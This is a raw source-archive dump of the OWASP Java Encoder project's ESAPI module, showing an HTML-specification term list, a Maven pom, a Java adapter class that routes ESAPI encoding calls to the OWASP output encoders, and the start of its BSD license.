min minimum minimum value misinterpreted for compatibility mode month most\n recently reported readiness state most appropriate\n application cache most appropriate application\n cache most recently\n reported readiness state most recently\n reported playback state most recently\n reported readiness state most recently reported playback state move multicol multipage HTML multipart/form-data multipart/x-mixed-replace multiple mutable muted name named character\n references named character references named elements namedItem namedItem() naturalHeight naturalWidth nav navigate navigate to that fragment identifier navigated navigates navigating navigating\n a browsing context navigation navigation algorithm navigator navigator.onLine navigator.yieldForStorageUpdates() nearest activatable\n element need a date needs a date nested nested\n browsing context nested\n browsing context nested\n browsing context nested\n through nested browsing\n context nested browsing\n context nested browsing\n context nested browsing\n context nested browsing context nested browsing contexts nested through networkState networking\n task source networking task\n source networking task\n source networking task\n source networking task source new characters\n to be inserted into the tokenizer new characters to be inserted into the\n tokenizer newURL newer newest newline next next\n input character next input character nextid no-quirks\n mode no-quirks mode no-validate state noHref noResize noShade noValidate noWrap nobr noembed nofollow noframes nohref none noreferrer normal normal elements normalized\n TimeRanges object noscript noshade not handled not yet been loaded notes below noupdate novalidate nowrap number of days\n in month month of year year number of days\n in the month month and year year object obsolete obsolete\n permitted DOCTYPE obsolete features obsolete permitted\n DOCTYPEs obsolete permitted DOCTYPE obsolete permitted DOCTYPE string obtain obtain a\n physical form obtain a physical form obtain the storage mutex obtains a physical form off official\n playback position official playback\n position official playback position offline ol oldURL omitted on on commas on spaces onLine onabort onaddtrack onafterprint onbeforeprint onbeforeunload onblur onbounce oncached oncanplay oncanplaythrough onchange onchecking onclick oncontextmenu oncuechange ondblclick ondownloading ondrag ondragend ondragenter ondragleave ondragover ondragstart ondrop ondurationchange onemptied onended onenter onerror onexit onfinish onfocus onhashchange oninput oninvalid onkeydown onkeypress onkeyup online online\n whitelist online\n whitelist namespaces online\n whitelist online\n whitelist namespace online\n whitelist wildcard flag online whitelist online whitelist\n section online whitelist\n wildcard flag online whitelist\n namespace online whitelist\n namespaces online whitelist\n wildcard flag online whitelist\n sections onload onloadeddata onloadedmetadata onloadstart only if border is not equivalent to zero onmessage onmousedown onmousemove onmouseout onmouseover onmouseup onmousewheel onnoupdate onobsolete onoffline ononline onpagehide onpageshow onpause onplay onplaying onpopstate onprogress onratechange onreadystatechange onreset onresize onscroll onseeked onseeking onselect onshow onstalled onstart onstorage onsubmit onsuspend ontimeupdate onunload onupdateready onvolumechange onwaiting open open() opener opener\n browsing context opener browsing\n context opener browsing\n context opener browsing context optgroup optimum optimum value option options or\n equivalent or\n equivalent or\n equivalent or\n equivalent or equivalent ordered set of\n unique space-separated tokens ordered set of unique\n space-separated tokens ordinal\n value ordinal value ordinary origin original\n insertion mode original\n insertion mode original insertion mode origins other\n applicable specifications other applicable specifications our\n public bug database outerHTML outline outline depth outlines output override\n URL override\n URL override URL ownerDocument p pagehide pageshow paragraph paragraphing paragraphs param parameter parameters parent parent\n browsing context parent browsing\n context parent browsing\n context parent browsing context parent browsing contexts parentNode parse\n error parse\n error parse\n error parse\n errors parse\n error parse\n errors parse a\n time-zone offset component parse a date or\n time string parse a date or time\n string parse a date or time string parse a time component parse error parse errors parse it as an integer parse that\n attribute's value parse that attribute's\n value parsed parser pause flag parses parsing\n a date parsing\n a time parsing\n a week string parsing a date parsing a date and\n time parsing a date and time parsing a global\n date and time parsing a global date and time parsing a month parsing a time parsing a week parsing the attribute as a non-negative\n integer partially available past\n names map past names map pathname pattern patternMismatch pause pause() pauseOnExit paused paused for user\n interaction paused for user interaction paused media\n controller paused media\n controller paused media controller pending\n parsing-blocking script pending\n application cache download process tasks pending application\n cache download process tasks pending application cache\n download process tasks pending application cache download process\n tasks pending parsing-blocking\n script pending parsing-blocking\n script pending parsing-blocking\n script pending parsing-blocking script pending table character\n tokens persisted personalbar phrasing phrasing\n content phrasing\n content phrasing\n content phrasing content pick placeholder placeholder\n label option placeholder label\n option placeholder label option plain text file plaintext platform play play() playback ended playback has\n ended playback has ended playbackRate played playing playing\n media controller playing media\n controller playing media\n controller plugin plugins plugins are being\n sandboxed plugins aren't being sandboxed poly popstate port position possible track categories poster poster\n frame poster\n frame poster frame potentially\n playing potentially CORS-enabled fetch potentially active potentially playing practical\n concerns pragma-set default\n language pragma-set default language pre pre-click activation\n steps pre-click activation steps preferred\n style sheet set preferred MIME\n name preferred MIME\n name preferred MIME\n name preferred MIME name preferred MIME names preferred style sheet set prefetch prefix match prefix match\n patterns preload prepare prepare a\n script prepare a\n script prepare a script prepare an\n event prepare an event presentational\n hint presentational\n hint presentational hint presentational hints prev prevents content\n from creating new auxiliary browsing contexts prevents content from\n navigating browsing contexts other than the sandboxed browsing\n context itself prevents content from\n navigating their top-level browsing context prevents script from\n reading from or writing to the document.cookie IDL\n attribute primary context print print when\n loaded print() printing\n steps printing steps process the iframe\n attributes process the iframe attributes processing model for navigating across\n documents progress prompt protected mode proto-URLs protocol provide provide a stable\n state provide such information provides a paint\n source provides a stable state pubDate pubdate public list of\n any patent disclosures public-html-comments@w3.org pushState pushState() q queryCommandEnabled queryCommandIndeterm queryCommandState queryCommandSupported queryCommandValue queue queue\n a task queue a\n task queue a\n task queue a\n task queue a\n task queue a\n task queue a\n task queue a post-load task queue a task queue that task as a post-load task queued quirks\n mode quirks mode radio radio button\n group radio button group radiogroup rangeOverflow rangeUnderflow rank ranked ratechange raw\n value raw text raw text elements raw value rb re-resolved read-only\n mode read-only mode read/write\n mode read/write mode readOnly readiness\n state readiness state readonly ready ready for\n post-load tasks ready for post-load\n tasks ready for post-load tasks readyState readystatechange rebuilding receiving a set-cookie-string reconstruct the active formatting elements reconstruction of\n the active formatting elements rect rectangle rectangle\n state redirect steps reentrant invocation of the\n parser reentrant invocation of the parser referrer reflect reflected reflecting refused to allow this document\n to be unloaded refused to allow the document to be\n unloaded refused to allow the document to be unloaded register the names registerContentHandler registerContentHandler() registerProtocolHandler registerProtocolHandler() rel rel="" relList relevant\n application caches relevant\n application cache relevant application caches reload reload\n override buffer reload\n override flag reload override\n flag reload override\n buffer reload override\n flag reload override buffer reload override flag remove removeCue removed removed from removed from a\n Document removed from a\n document removed from a document render the drag feedback rendered legend rendering rules replace replace() replaceState replaceState() replacement\n enabled replacement\n enabled replacement\n enabled replacement\n enabled replacement\n enabled replacement enabled replacement must be enabled report an error report the controller\n state report the controller state report the error reporting script errors represent represented represented by\n the collection represented by the\n collection represented by the\n collection represented by the collection represents required reset reset\n algorithm reset algorithm reset the form\n owner reset the form owner resettable resettable\n element resettable element resolve resolveURL resolved resolving resolving of relative URLs resolving relative URLs resource resource\n fetch algorithm resource fetch\n algorithm resource fetch\n algorithm resource fetch algorithm resource metadata management resource selection\n algorithm resource selection\n algorithm resource selection\n algorithm resource selection algorithm resource sharing check restrictions resulting\n autocompletion state resulting autocompletion\n state resulting autocompletion state return\n value return value returnValue returned to the script rev reversed right root\n element root\n element root\n element of a Document object root element row row\n groups row group row group\n headers row groups row header rowIndex rowSpan rowgroup rows rowspan rp rt rtl ruby rules rules\n for distinguishing if a resource is text or binary rules\n for parsing non-negative integers rules\n for updating the text track rendering rules for\n constructing the chapter tree from a text track rules for parsing\n manifests rules for parsing\n floating point number values rules for parsing\n integers rules for parsing\n floating point number values rules for parsing\n non-negative integers rules for parsing a\n legacy color value rules for parsing a hash-name reference rules for parsing a legacy\n color value rules for parsing a legacy color\n value rules for parsing a legacy color value rules for parsing a list of dimensions rules for parsing a list of integers rules for parsing dimension values rules for parsing floating\n point number values rules for parsing floating point\n number values rules for parsing floating point number\n values rules for parsing floating point number values rules for parsing integers rules for parsing non-negative\n integers rules for parsing non-negative\n integers rules for parsing non-negative\n integers rules for parsing non-negative integers rules for parsing signed integers rules for parsing simple color values rules for serializing simple color values rules for updating\n the text track rendering rules for updating the\n display of WebVTT text tracks rules for updating the display of\n WebVTT text tracks rules for updating the display of WebVTT\n text tracks rules for updating the display of WebVTT text\n tracks rules for updating the text\n track rendering rules for updating the text track\n rendering rules for updating the text track rendering run\n pre-click activation steps run\n canceled activation steps run canceled activation\n steps run post-click activation steps run pre-click\n activation steps run synthetic click\n activation steps run synthetic click activation\n steps run synthetic click activation steps runs s salvageable same same\n origin same\n origin same\n origin same\n origin same origin samp sandbox sandboxed\n automatic features browsing context flag sandboxed\n automatic features browsing context flag sandboxed\n navigation browsing context flag sandboxed\n top-level navigation browsing context flag sandboxed\n plugins browsing context flag sandboxed automatic features browsing\n context flag sandboxed forms\n browsing context flag sandboxed into a unique origin sandboxed navigation browsing context flag sandboxed origin\n browsing context flag sandboxed plugins browsing context flag sandboxed scripts browsing context flag sandboxed seamless iframes flag sandboxed top-level navigation browsing\n context flag satisfies its constraints satisfy its constraints satisfy their\n constraints scheme scope scoped script script\n content restrictions script\n data escaped state script\n execution environment script\n documentation script content restrictions script data\n state script data\n double escaped state script data\n escaped state script data\n state script data double escape end state script data double escape start\n state script data double escaped\n state script data double escaped dash\n state script data double escaped dash dash\n state script data double escaped less-than\n sign state script data double escaped state script data end tag name state script data end tag open state script data escape start dash\n state script data escape start state script data escaped dash dash\n state script data escaped dash state script data escaped end tag name\n state script data escaped end tag open state script data escaped less-than sign\n state script data escaped state script data less-than sign state script data state script documentation script error notifications script execution environment script nesting level script's\n browsing context script's\n document script's\n global object script's URL character\n encoding script's URL character\n encoding script's URL character encoding script's base URL script's browsing\n context script's browsing context script's document script's global\n object script's global\n object script's global object script-created parser scripting scripting disabled scripting flag scripting is\n disabled scripting is\n disabled scripting is disabled scripting is enabled scripting was enabled scripting was enabled or not scripts scroll scroll an element into view scroll to the fragment\n identifier scroll to the fragment identifier scrollAmount scrollDelay scrollbars scrolling seamless seamless\n browsing context flag seamless\n browsing context flag seamless\n iframe seamless browsing context flag search secondary\n browsing context secondary browsing\n context section section\n 6 of the W3C Patent Policy sectionRowIndex sectioning sectioning\n content sectioning\n content sectioning\n root sectioning content sectioning root sectioning roots sections secured seek seek the\n media controller seek the\n media controller seek the media\n controller seek the media controller seekable seeked seeking select select() selected selected\n coordinate selected\n files selected files selectedIndex selectedOptions selectedness selectionDirection selectionEnd selectionStart self self-closing start tag\n state self-closing start tag state sends a signal session\n history entry session\n histories session\n history session histories session history session history\n entry session history\n entry session history entries session history entry set\n of space-separated tokens set of\n scripts that will execute as soon as possible set of\n scripts that will execute as soon as possible set of\n comma-separated tokens set of comma-separated tokens set of space-separated\n tokens set of space-separated tokens set the document's address set the value of a new\n indexed property setCustomValidity setCustomValidity() setData setDragImage setDragImage() setInterval setInterval() setSelectionRange setSelectionRange() setTimeout setTimeout() setter setter creator shape sheet should be used showModalDialog showModalDialog() showing showing by\n default showing by default shows caching\n progress shows caching progress simple\n color simple\n color simple color single page HTML size sizes skip White_Space\n characters slaved slaved\n media elements slaved\n media elements slaved media\n elements slaved media\n elements slaved media element slaved media elements slide slots small snapToLines sniffed type of the\n resource soft source source\n node source\n node source\n browsing context source\n browsing context source browsing\n context source browsing\n context source browsing\n context source browsing context source node space\n characters space\n characters space\n character space\n characters space\n characters space\n characters space character space characters spacer span special specially focusable specified specifies specifies an\n operation specify an\n operation spellcheck spin the event loop spins\n the event loop split it on\n spaces split on\n spaces split on\n spaces split on spaces split the\n attribute's value on spaces split the\n string on commas split the attribute value on commas split the attribute's\n value on spaces split the content\n attribute on spaces splitting value on spaces splitting on commas src srcdoc srclang stack\n of open elements stack\n of open elements stack of\n open elements stack of\n open elements stack of\n open elements stack of open\n elements stack of open\n elements stack of open\n elements stack of open\n elements stack of open\n elements stack of open elements stall timeout stalled standby start start\n tag start\n times start tag start time start times startOffsetTime startTime state state\n objects state object state objects statically validate the\n constraints status statusbar step step\n base step base step scale\n factor step scale factor stepDown stepDown() stepMismatch stepUp stepUp() steps to expose a\n media-resource-specific text track stop stop parsing stopped stopped due to errors stopped parsing stops stops\n parsing storage\n mutex storage mutex strictly splitting the\n string strike strip leading\n and trailing whitespace strip leading and\n trailing whitespace strip leading and\n trailing whitespace stripped line breaks stripping leading and trailing whitespace strong structured\n clone structured\n clone structured clone style style rule suggested in the rendering\n section style sheet\n ready style sheet ready stylesheet styling processing\n model styling processing model sub submit submit\n button submit\n buttons submit button submit buttons submit() submittable submittable elements submitted submitting subscribe subtitle subtitles suffer from a step\n mismatch suffer from a step mismatch suffering from a\n type mismatch suffering from a custom\n error suffering from a custom error suffering from a pattern mismatch suffering from a step mismatch suffering from a type mismatch suffering from an\n overflow suffering from an\n underflow suffering from an overflow suffering from an underflow suffering from being\n missing suffering from being missing suffering from being too long suggestions\n source element suggestions source\n element suggestions source element summary sup support the scripting\n language supported\n property names supported property\n indices supported property indices supported property names supporting the suggested\n default rendering suspend svg swapCache swapCache() synchronous\n section synchronous\n section synchronous\n sections synchronous\n section synchronous section synchronous sections syntax for which tBodies tFoot tHead tabIndex tabindex table table\n model table layout techniques table model table model\n errors table model error tables tag tag\n name state tag cloud tag name tag name\n state tag open state tags target target element task task\n queue task\n queue task\n queues task\n queues task\n source task\n queue task queue task queues task source task sources tasks tbody td techniques for describing\n tables tel temporary\n buffer temporary buffer term text text\n track cue writing direction text\n track text\n track cue writing direction text\n track text\n nodes text\n track text\n track cue active flag text\n track kind text\n tracks text\n node text\n track text\n track cue size text\n track cue writing direction text\n track mode text\n tracks text field text node text nodes text track text track\n cue text track\n mode text track\n cue order text track\n cues text track\n cue text track\n cue display state text track\n cue start time text track\n kind text track\n label text track\n mode text track\n cue text track\n cues text track\n mode text track\n readiness state text track cue text track cue\n display state text track cue\n pause-on-exit flag text track cue\n active flag text track cue\n end time text track cue\n identifier text track cue\n pause-on-exit flag text track cue\n size text track cue\n start time text track cue\n text text track cue\n writing direction text track cue\n identifier text track cue\n order text track cue\n pause-on-exit flag text track cue\n size text track cue\n text text track cue active\n flag text track cue active\n flag text track cue active flag text track cue display state text track cue end\n time text track cue end\n time text track cue end time text track cue identifier text track cue order text track cue pause-on-exit\n flag text track cue pause-on-exit\n flag text track cue pause-on-exit flag text track cue size text track cue start\n time text track cue start\n time text track cue start time text track cue text text track cue writing\n direction text track cue writing direction text track cues text track disabled text track failed to load text track hidden text track kind text track label text track language text track list of cues text track loaded text track loading text track mode text track not loaded text track readiness\n state text track readiness\n state text track readiness state text track showing text tracks text-level semantics\n usage summary text/cache-manifest text/html text/plain textContent textLength textPosition textTracks textTracks[ textarea textarea effective height textarea effective width tfoot th that algorithm the\n resource's Content-Type metadata the\n script block's type the\n script block's type the\n resource's Content-Type metadata the\n directionality the\n document's address the\n title element the\n address the\n directionality the\n document's current address the\n script block's type the\n title element the\n conditions described above the\n incumbent body element the\n html element the\n HTML syntax the\n active formatting elements are reconstructed the\n body element the\n directionality the\n document's address the\n document's current address the\n drag data item kind the\n link is an alternative stylesheet the\n rules for choosing a browsing context given a browsing context\n name the\n script settings determined from the node the Document's address the applet\n element the embed element the head\n element the head element the html element the object element the title\n element the title element the origin it was\n assigned when its browsing context was created the HTML\n syntax the HTML syntax the URL given by this\n link the W3C CVS server the XHTML\n syntax the XHTML\n syntax the XHTML syntax the attributes common to all media\n elements the body\n element the body\n element the body\n element the body element the current address the directionality the document's\n address the document's\n current address the document's\n address the document's address the document's current\n address the document's current address the document's domain the drag data\n item type string the drag data item\n kind the drag data item\n kind the drag data item\n kind the drag data item kind the drag data item type\n string the drag data item type string the encoding of the\n document itself the event handler processing algorithm the example in the File\n Upload state section the handling for misnested tags the indicated part of the\n document the indicated part of the\n document the indicated part of the document the link is an\n alternative stylesheet the location bar BarProp\n object the manifest the menu bar BarProp\n object the next step the personal bar BarProp\n object the rendering section the requirements given in the prose the resource's Content-Type\n metadata the resource's Content-Type\n metadata the rules\n described previously the rules for choosing a\n browsing context given a browsing context name the rules for choosing a browsing context given a\n browsing context name the rules for choosing a browsing context given a browsing\n context name the script\n block's type the script\n settings determined from the node the script block's\n character encoding the script block's\n type the script block's\n type the script block's character encoding the script block's fallback character\n encoding the script block's fallback character\n encoding the script block's source the script block's type the scrollbar BarProp\n object the section on\n footnotes the section the linking element is most\n closely associated with the sniffed type of the resource the stack the status bar BarProp\n object the step labeled\n "fragment identifiers" the text tracks are ready the toolbar BarProp\n object thead their document's current\n address this this is\n a reference, not a copy this is a reference, not a copy through which time time-zone\n offset time-zone offset timeline\n offset timeline offset timeupdate title toBlob toDataURL toDataURL() toggle tokenization tokenizer tooLong toolbar top top-level\n browsing context top-level\n browsing context top-level\n browsing context top-level browsing\n context top-level browsing\n context top-level browsing\n context top-level browsing\n context top-level browsing\n contexts top-level browsing context top-level browsing contexts tr track track\n URL track\n label track URL track label track language trademark transparent transparently follow the redirect traverse the\n history by a delta traverse the history by\n a delta traverse the history by a\n delta traverse the history by a delta traversing the\n history tree\n order tree\n order tree\n construction tree\n order tree construction tree order true-by-default trueSpeed truespeed trusted tt turn off turned off turned on type type\n sniffing rules type blacklist type information type string typeMismatch typeMustMatch typemustmatch types u ul unavailable undo transaction history unfocusing\n steps unfocusing steps unique\n identifier unique identifier unique identifier (ID) unit\n of related similar-origin browsing contexts unit of\n related similar-origin browsing contexts unit of related browsing\n contexts unit of related browsing contexts unit of related similar-origin browsing\n contexts unit of related similar-origin browsing contexts unload a\n document unload a document unloading document cleanup steps unordered\n set of unique space-separated tokens unordered set of unique\n space-separated tokens unordered set of unique space-separated tokens unquoted unregisterContentHandler unregisterProtocolHandler up update update\n status update status update the\n image data update the\n session history with the new page update the image data update the session\n history with the new page update the session history with\n the new page update the session history with the new\n page update the session history with the new page updated the image\n data updateready updating the session history with\n the new page upgrade\n attempt upgrade\n attempt upgrade attempt use the plugin that supports resource type use-credentials useMap used during the parsing usemap user\n interaction task source user interaction user interaction task\n source user interaction task\n source user interaction task source userAgent using the\n rules for using the rules for vAlign vCard MIME Directory\n Profile vLink valid valid\n URL valid\n integer valid\n MIME type valid\n date string valid\n date string in content with optional time valid\n floating point number valid\n floating point numbers valid\n forced-UTC global date and time string valid\n global date and time string valid\n integer valid\n local date and time string valid\n media query valid\n month string valid\n non-empty URL potentially surrounded by spaces valid\n non-negative integers valid\n simple color valid\n time string valid\n week string valid MIME\n type valid MIME type valid MIME type with no parameters valid MIME types with no parameters valid URL valid URL\n potentially surrounded by spaces valid URL potentially\n surrounded by spaces valid URL potentially surrounded by\n spaces valid browsing\n context name or keyword valid browsing\n context names or keywords valid browsing context\n name valid browsing context\n name or keyword valid browsing context name valid browsing context name\n or keyword valid date\n string valid date or\n time string valid date or time string valid date or time string in content valid date string valid date string with\n optional time valid date string with optional\n time valid e-mail address valid e-mail address\n list valid e-mail address list valid floating\n point number valid floating point\n number valid floating point\n numbers valid floating point number valid floating point numbers valid forced-UTC\n global date and time string valid forced-UTC global date and time\n string valid global\n date and time string valid global date and\n time strings valid global date and\n time string valid global date and time\n string valid global date and time string valid hash-name reference valid integer valid integers valid list of\n integers valid local date and\n time string valid local date and time\n string valid local date and time string valid lowercase simple color valid media query valid month\n string valid month string valid non-empty\n URL potentially surrounded by spaces valid non-empty URL valid non-empty URL potentially\n surrounded by spaces valid non-empty URL potentially surrounded by\n spaces valid non-negative\n integer valid non-negative\n integers valid non-negative integer valid simple color valid time\n string valid time string valid week\n string valid week string validationMessage validity validity states valign value value\n sanitization algorithm value mode\n flag value mode flag value sanitization\n algorithm value sanitization\n algorithm value sanitization algorithm values valueAsDate valueAsDate valueAsNumber valueMissing valueType values values are\n reset valuetype var various W3C HTML WG\n lists various WHATWG lists version vertical\n growing right vertical growing\n left vertical growing\n right vertical growing\n left vertical growing left vertical growing right video videoHeight videoTracks videoWidth violation visible vlink vlinkColor void elements volume volumechange vspace waiting wbr web developer edition week week number of\n the last day week number of the last day whatwg@whatwg.org when the metadata of the clip becomes\n known whitelisted scheme whitespace whitespace trimming width width of the\n select's labels will will\n not will be fired will cause willValidate willful\n violation willful violation window window.alert() window.applicationCache window.close() window.open() wrap write writeln writing direction xml:base xml:lang xmp yet more restrictions yieldForStorageUpdates owasp-java-encoder-1.2.3/esapi/000077500000000000000000000000001375203724500163135ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/pom.xml000066400000000000000000000052611375203724500176340ustar00rootroot00000000000000 4.0.0 org.owasp.encoder encoder-parent 1.2.3 encoder-esapi jar ESAPI Thunk The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder Projects API into an implementation of ESAPI. org.owasp.encoder encoder ${project.parent.version} org.owasp.esapi esapi [2.2,3) owasp-java-encoder-1.2.3/esapi/src/000077500000000000000000000000001375203724500171025ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/000077500000000000000000000000001375203724500200265ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/000077500000000000000000000000001375203724500207475ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/000077500000000000000000000000001375203724500215365ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/000077500000000000000000000000001375203724500226675ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/encoder/000077500000000000000000000000001375203724500243065ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/encoder/esapi/000077500000000000000000000000001375203724500254075ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java000066400000000000000000000227241375203724500304220ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.esapi; import java.io.IOException; import java.net.URI; import org.owasp.encoder.Encode; import org.owasp.esapi.Encoder; import org.owasp.esapi.codecs.Codec; import org.owasp.esapi.errors.EncodingException; import org.owasp.esapi.reference.DefaultEncoder; /** * ESAPIEncoder is a singleton implementation of the ESAPI Encoder API. It * is meant to allow quick and easy drop-in replacement of the default * encoder included with the ESAPI library, as the Encoder libraries are * faster and use less memory thus cause fewer garbage collections. * *

    Please note that the OWASP Java Encoders does not implement all * the encodings of the ESAPI Encoder API. In such situations this * implementation will fallback onto the default reference implementation * included with ESAPI. Thus you should see the performance benefit from * the methods included in the Encoder, but still maintain compatibility * with all methods from ESAPI Encoder.

    * *

    For clarity, the reason the OWASP Java Encoders do not include some * of the ESAPI library is that the Encoders library is specifically focused * on encoding, and thus does not include:

    * *
      *
    • Input validation/normalization methods: * {@link org.owasp.esapi.Encoder#canonicalize(String)}, * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean)}, * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean, boolean)} * {@link org.owasp.esapi.Encoder#getCanonicalizedURI(URI)}
      • * *
    • Decoding methods: * {@link org.owasp.esapi.Encoder#decodeForHTML(String)}, * {@link org.owasp.esapi.Encoder#decodeFromURL(String)}
      • * *
    • Binary-to-text/text-to-binary: * {@link org.owasp.esapi.Encoder#encodeForBase64(byte[], boolean)}, * {@link org.owasp.esapi.Encoder#decodeFromBase64(String)}.
      • * *
    • Bind-able APIs (such as {@link java.sql.PreparedStatement}: * {@link org.owasp.esapi.Encoder#encodeForSQL(org.owasp.esapi.codecs.Codec, String)}, * {@link org.owasp.esapi.Encoder#encodeForXPath(String)}, * {@link org.owasp.esapi.Encoder#encodeForOS(org.owasp.esapi.codecs.Codec, String)}
      • * *
    • Rarely-used or alternate compatible encoding: * {@link org.owasp.esapi.Encoder#encodeForVBScript(String)}, * {@link org.owasp.esapi.Encoder#encodeForLDAP(String)}, * {@link org.owasp.esapi.Encoder#encodeForLDAP(String, boolean)}, * {@link org.owasp.esapi.Encoder#encodeForDN(String)}
      • *
    * *

    (Please note that with sufficient feedback from the user base, the above * mentioned methods may be implemented in future releases of the OWASP * Java Encoders, if/when that happens, this shim class will be updated to * call out to the new methods.)

    * *

    You may notice that this class does not actually implement Encoder * itself. Instead it simply provides a {@link #getInstance()} method that * does. This allows the implementation details maximum flexibility by not * creating a any public API that would restrict changes later

    * * @author jeffi */ public final class ESAPIEncoder { /** No instances. */ private ESAPIEncoder() {} /** * Returns an instance of the Encoder. This method is the only supported * mechanism by which an ESAPIEncoder instance should be obtained. The * returned implementation is guaranteed to be thread-safe for the methods * that the OWASP Java Encoders implement (see class documentation). * Though not a requirement of the ESAPI Encoder API, the returned value * is also serializable. * * @return An encoder implementation that uses the OWASP Java Encoders * for most of the common encoding methods. */ public static Encoder getInstance() { return Impl.INSTANCE; } /** * This is the private singleton that implements the ESAPI Encoder shim. * It is implemented as a single-value enum to get all the "free" singleton * properties associated with enums--such as serialization, and on-demand * initialization. * *

    The implementation is intentionally private to avoid any API baggage. * The instance should be obtained using * {@link org.owasp.encoder.esapi.ESAPIEncoder#getInstance()}.

    */ private enum Impl implements Encoder { /** * The singleton instance. */ INSTANCE; /** * The reference encoder from ESAPI. Any ESAPI method without an * OWASP Java Encoder equivalent is delegated to this instance. */ private final Encoder _referenceEncoder = DefaultEncoder.getInstance(); /** {@inheritDoc} */ public String canonicalize(String s) { return _referenceEncoder.canonicalize(s); } /** {@inheritDoc} */ public String canonicalize(String s, boolean strict) { return _referenceEncoder.canonicalize(s, strict); } /** {@inheritDoc} */ public String canonicalize(String s, boolean restrictMultiple, boolean restrictMixed) { return _referenceEncoder.canonicalize(s, restrictMultiple, restrictMixed); } /** {@inheritDoc} */ public String getCanonicalizedURI(URI dirtyUri) { return _referenceEncoder.getCanonicalizedURI(dirtyUri); } /** {@inheritDoc} */ public String encodeForCSS(String s) { return Encode.forCssString(s); } /** {@inheritDoc} */ public String encodeForHTML(String s) { return Encode.forHtml(s); } /** {@inheritDoc} */ public String decodeForHTML(String s) { return _referenceEncoder.decodeForHTML(s); } /** {@inheritDoc} */ public String encodeForHTMLAttribute(String s) { return Encode.forHtmlAttribute(s); } /** {@inheritDoc} */ public String encodeForJavaScript(String s) { return Encode.forJavaScript(s); } /** {@inheritDoc} */ public String encodeForVBScript(String s) { return _referenceEncoder.encodeForVBScript(s); } /** {@inheritDoc} */ public String encodeForSQL(Codec codec, String s) { return _referenceEncoder.encodeForSQL(codec, s); } /** {@inheritDoc} */ public String encodeForOS(Codec codec, String s) { return _referenceEncoder.encodeForOS(codec, s); } /** {@inheritDoc} */ public String encodeForLDAP(String s) { return _referenceEncoder.encodeForLDAP(s); } /** {@inheritDoc} */ public String encodeForLDAP(String s, boolean b) { return _referenceEncoder.encodeForLDAP(s, b); } /** {@inheritDoc} */ public String encodeForDN(String s) { return _referenceEncoder.encodeForDN(s); } /** {@inheritDoc} */ public String encodeForXPath(String s) { return _referenceEncoder.encodeForXPath(s); } /** {@inheritDoc} */ public String encodeForXML(String s) { return Encode.forXml(s); } /** {@inheritDoc} */ public String encodeForXMLAttribute(String s) { return Encode.forXmlAttribute(s); } /** {@inheritDoc} */ public String encodeForURL(String s) throws EncodingException { return Encode.forUri(s); } /** {@inheritDoc} */ public String decodeFromURL(String s) throws EncodingException { return _referenceEncoder.decodeFromURL(s); } /** {@inheritDoc} */ public String encodeForBase64(byte[] bytes, boolean wrap) { return _referenceEncoder.encodeForBase64(bytes, wrap); } /** {@inheritDoc} */ public byte[] decodeFromBase64(String s) throws IOException { return _referenceEncoder.decodeFromBase64(s); } } } owasp-java-encoder-1.2.3/esapi/src/main/resources/000077500000000000000000000000001375203724500220405ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/resources/META-INF/000077500000000000000000000000001375203724500232005ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/resources/META-INF/LICENSE000066400000000000000000000027711375203724500242140ustar00rootroot00000000000000Copyright (c) 2015 Jeff Ichnowski All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 